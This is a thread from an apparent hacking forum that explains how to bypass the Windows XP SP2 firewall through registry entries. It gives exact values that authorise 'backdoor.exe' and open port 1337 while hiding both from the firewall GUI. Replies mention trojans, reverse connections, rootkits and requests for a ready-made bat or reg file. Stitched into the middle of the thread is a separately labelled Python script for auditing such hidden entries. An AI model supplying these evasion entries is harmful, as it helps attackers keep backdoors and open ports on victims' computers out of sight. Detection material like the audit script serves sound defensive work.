da_cash
We can bypass Windows Firewall using the registry.

Just open regedit.exe and go to:

CODE
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List


As you can see, the SharedAccess service (aka Windows Firewall) contains the names of applications allowed for outbound connections.

To give access to the desired application we need to add a similar key:
CODE
"C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled"


But then our "backdoor" will be listed in the Firewall GUI's allowed applications.

Anyway, we may hide it by making it like this:

CODE
"C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled:@xpsp2res.dll,-22019"



We can also globally open any port we want:
CODE
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List


by adding a similar value inside this registry key:

CODE
"1337:TCP"="1337:TCP:*:Enabled:Name"


Where "Name" is the name we want to be shown in the GUI.

To hide the port from the listing in the GUI we may do something like this:


CODE
1337:TCP:*:Enabled:@xpsp2res.dll,-22003


and then the port will be hidden from the listing (XP SP2).

It works on XP SP2; I didn't test it on any other OS.

This method is used by some malware/spyware manufacturers, and together with a rootkit it may be really dangerous.
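As an added, defender-side example (not from this post or the forum): a Python audit of an exported fragment of those two List keys, in the value layout the post describes, that flags enabled exceptions absent from a known-good baseline and singles out the ones whose display name is a resource reference, since that is what keeps them out of the GUI. The .reg sample and the baseline are constructed for the example; obtaining a real fragment with `reg export` is assumed.

```python
import re

# Constructed sample (not a real export) of the two firewall lists in .reg
# format, laid out as the post describes: value name = path or "port:proto",
# data = "<path or port:proto>:<scope>:<Enabled|Disabled>:<display name>".
SAMPLE_REG = r'''
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\Program Files\\Messenger\\msmsgs.exe"="C:\\Program Files\\Messenger\\msmsgs.exe:*:Enabled:Windows Messenger"
"C:\\Tools\\putty.exe"="C:\\Tools\\putty.exe:*:Enabled:PuTTY"
"C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled:@xpsp2res.dll,-22019"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"3389:TCP"="3389:TCP:*:Enabled:Remote Desktop"
"1337:TCP"="1337:TCP:*:Enabled:@xpsp2res.dll,-22003"
'''

# Hypothetical known-good baseline: value names expected on a clean build.
BASELINE = {r"C:\Program Files\Messenger\msmsgs.exe", "3389:TCP"}

KEY_RE = re.compile(r'^\[.*\\(\w+)\\List\]$')
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')

# Undo .reg escaping of backslashes and double quotes.
def unescape(s):
    return re.sub(r'\\(.)', r'\1', s)

def parse_lists(reg_text):
    """Return {list_name: [(value_name, data), ...]} for each ...\\List key."""
    lists, current = {}, None
    for line in reg_text.splitlines():
        key = KEY_RE.match(line.strip())
        if key:
            current = lists.setdefault(key.group(1), [])
            continue
        value = VALUE_RE.match(line.strip())
        if value and current is not None:
            current.append((unescape(value.group(1)), unescape(value.group(2))))
    return lists

def audit(reg_text, baseline=BASELINE):
    """Flag enabled exceptions missing from the baseline; '@dll,-id' names hide the entry in the GUI."""
    findings = []
    for list_name, entries in parse_lists(reg_text).items():
        for name, data in entries:
            # Split from the right: an application path itself contains "C:".
            *_, state, display = data.rsplit(":", 2)
            if state != "Enabled" or name in baseline:
                continue
            reason = ("hidden from GUI (resource-string display name)"
                      if display.startswith("@") else "not in baseline")
            findings.append((list_name, name, reason))
    return findings
```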
Jumpi
I use to free the port my trojan uses. It works with a single command line; I'm gonna look for it when I'm at home again.

A reverse connection was never stopped by the SP2 firewall; this seems to be the best method at the moment because you don't see anything strange in the firewall settings.
o0oKARo0o
It does work, excellent tip.
knull
good, good, good...

BN says:
This was the 3rd useless post in 21 posts. Disabled account 28 days. Any other takers?
o0oKARo0o
Actually it works, but it's still in the list, under Remote Assistance. Any ideas?
And using a rootkit afterwards, the connection isn't allowed by the firewall anymore due to the nonexistence of the program...
ninar12
One question: why don't you use "netsh"?

netsh firewall ...


Much more comfortable.

But I don't know if it's a native command under NT.
XP I'm sure it works.
Lie8
Very very good tut.... Thanks.

BN says:
This person had 3 useless posts out of 10. Another 28-day winner!
dw-chow
Nice, but one question still remains... is it possible to get through it by remote means?
bah
Actually I have another question. I checked on win3k for the reg keys and couldn't find any, even though Windows Firewall was up and applications had been added to the exempt list from the GUI. So where are the win3k reg keys, and does the :@xpsp2res.dll,-22003 work under w3k?
AdmiralB
Maybe someone can compile it into a nice bat file.
smith_john
Nice topic.


From Packet: Sounds like a thx post to me! Warning points added. And from a chronic thanks poster so muchos suspend too.
Jackson
Hello, really idea!! However, somebody can pack it in a regfile, then one only must explain! And how is that with other firewalls, does this function there too??
Invision Power Board © 2001-2005 Invision Power Services, Inc.